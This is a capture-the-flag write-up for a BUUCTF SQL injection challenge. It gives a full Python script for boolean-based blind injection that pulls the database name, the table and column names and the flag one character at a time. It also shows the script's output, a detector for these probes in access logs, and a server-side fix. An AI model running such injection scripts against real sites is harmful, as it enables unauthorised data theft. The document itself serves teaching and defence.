[WUSTCTF2020]颜值成绩查询
Opening the page shows an input box for running a query, so SQL injection is the first thing to try. First submit:
if(length(database()) > 1, 1, 0)
Data is returned, but submitting:
if(length(database()) > 3, 1, 0)
returns nothing, so this is boolean-based blind injection and the flag can be extracted one character at a time. Script:
import requests

vision_str = r'''!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~'''
Original_url = "http://26d6f65d-9a43-404c-bd19-01f916f30201.node4.buuoj.cn:81/?stunum="
Success_message = "Hi"  # string present in the response when the injected condition is true


def database_name():
    name = ''
    for i in range(1, 10):  # i-th character of the database name
        begin = 32
        end = 126
        mid = (begin + end) // 2  # floor division: integer part of the quotient (rounded down)
        while begin < end:
            url = Original_url + "if(ascii(substr(database(), %d, 1)) > %d, 1, 0)" % (i, mid)
            RowText = requests.get(url, timeout=100)
            if Success_message in RowText.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if (mid == 32):  # no more characters: the search converged on the lower bound
            print()
            break
        name += chr(mid)
        print("\r数据库名: " + name, end="")
    return name


def table_name():
    name = ''
    table_list = []
    for j in range(1, 100):  # j-th character of the concatenated table names
        begin = 32
        end = 126
        mid = (begin + end) // 2  # floor division: integer part of the quotient (rounded down)
        while begin < end:
            url = Original_url + 'if((select/**/ascii(substr(group_concat(table_name),%d,1))/**/from/**/information_schema.tables/**/where/**/table_schema=database())>%d,1,0)' % (j, mid)
            RowText = requests.get(url, timeout=100)
            if Success_message in RowText.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if (mid == 32):
            print()
            break
        name += chr(mid)
        print("\r表名: " + name, end="")
    table_list = name.split(",")
    for table_name in table_list:
        column_name(table_name)


def column_name(table_name):
    name = ''
    column_list = []
    for j in range(1, 100):  # j-th character of the concatenated column names
        begin = 32
        end = 126
        mid = (begin + end) // 2  # floor division: integer part of the quotient (rounded down)
        while begin < end:
            url = Original_url + 'if((select/**/ascii(substr(group_concat(column_name),%d,1))/**/from/**/information_schema.columns/**/where/**/table_name="%s"/**/and/**/table_schema=database()) > %d, 1, 0)' % (j, table_name, mid)
            RowText = requests.get(url, timeout=100)
            if Success_message in RowText.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if (mid == 32):
            print()
            break
        name += chr(mid)
        print(("\r表%s的字段名: " + name) % table_name, end="")
    column_list = name.split(",")
    for column_name in column_list:
        GetData(table_name, column_name)


def GetData(table_name, column_name):
    data = ''
    for i in range(1, 100):  # i-th character of the data
        begin = 32
        end = 126
        mid = (begin + end) // 2  # floor division: integer part of the quotient (rounded down)
        while begin < end:
            url = Original_url + 'if(ascii(substr((select/**/%s/**/from/**/%s),%d,1)) > %d,1, -1)' % (column_name, table_name, i, mid)
            RowText = requests.get(url, timeout=100)
            if Success_message in RowText.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if (mid == 32):
            print()
            break
        data += chr(mid)
        print(("\r表%s的字段%s数据: " + data) % (table_name, column_name), end="")


database_name()
table_name()
Output:
数据库名: ctf
表名: flag,score
表flag的字段名: flag,value
表flag的字段flag数据: flag
表flag的字段value数据: flag{1f57fe04-406e-4037-b313-2dba09c240b7}
表score的字段名: id,name,score
Binary search over the ASCII range is what keeps the per-character extraction fast.
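From the defender's side, the same probe shapes are easy to spot in access logs. The following is an added example, not code from the original writeup: it triages constructed log lines (IPs, timestamps and paths are made up) and counts, per client, requests whose stunum value is not the plain integer id a legitimate client would send and that match one of the keyword patterns used above (if(...), ascii(substr(...)), information_schema, database()), after collapsing the /**/ comment padding the script uses in place of spaces.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not from the original page), shaped like
# the requests the extraction script above sends to /?stunum=...
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0000] "GET /?stunum=1 HTTP/1.1" 200 512
10.0.0.7 - - [12/May/2024:10:01:03 +0000] "GET /?stunum=if(length(database())%20%3E%201,%201,%200) HTTP/1.1" 200 512
10.0.0.7 - - [12/May/2024:10:01:04 +0000] "GET /?stunum=if((select/**/ascii(substr(group_concat(table_name),1,1))/**/from/**/information_schema.tables/**/where/**/table_schema=database())>79,1,0) HTTP/1.1" 200 512
10.0.0.9 - - [12/May/2024:10:01:05 +0000] "GET /?stunum=42 HTTP/1.1" 200 498
"""

# Keyword shapes taken from the probe strings used on this page.
PROBE_PATTERNS = [
    re.compile(r"\bif\s*\(", re.I),
    re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    re.compile(r"\binformation_schema\b", re.I),
    re.compile(r"\bdatabase\s*\(\s*\)", re.I),
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalise(value):
    """Collapse MySQL inline comments (/**/) used as whitespace so obfuscated keywords still match."""
    return re.sub(r"/\*.*?\*/", " ", value)

def classify_line(line):
    """Return (ip, decoded stunum, matched patterns), or None if the line is not a stunum request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlparse(m["target"]).query)  # parse_qs already URL-decodes the value
    if "stunum" not in params:
        return None
    value = normalise(params["stunum"][0])
    return m["ip"], value, [p.pattern for p in PROBE_PATTERNS if p.search(value)]

def find_probing_clients(log_text, threshold=1):
    """Count, per client IP, stunum requests that are not a plain integer id (the
    only legitimate shape for this parameter) and match at least one probe pattern."""
    counts = {}
    for line in log_text.splitlines():
        res = classify_line(line)
        if res is None:
            continue
        ip, value, hits = res
        if not value.isdigit() and hits:
            counts[ip] = counts.get(ip, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

The same `value.isdigit()` check is the server-side fix: reject anything that is not an integer id before it reaches the query, and bind the id as a parameter rather than concatenating it.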
References
BUUCTF:[WUSTCTF2020]颜值成绩查询_末初 · mochu7-CSDN博客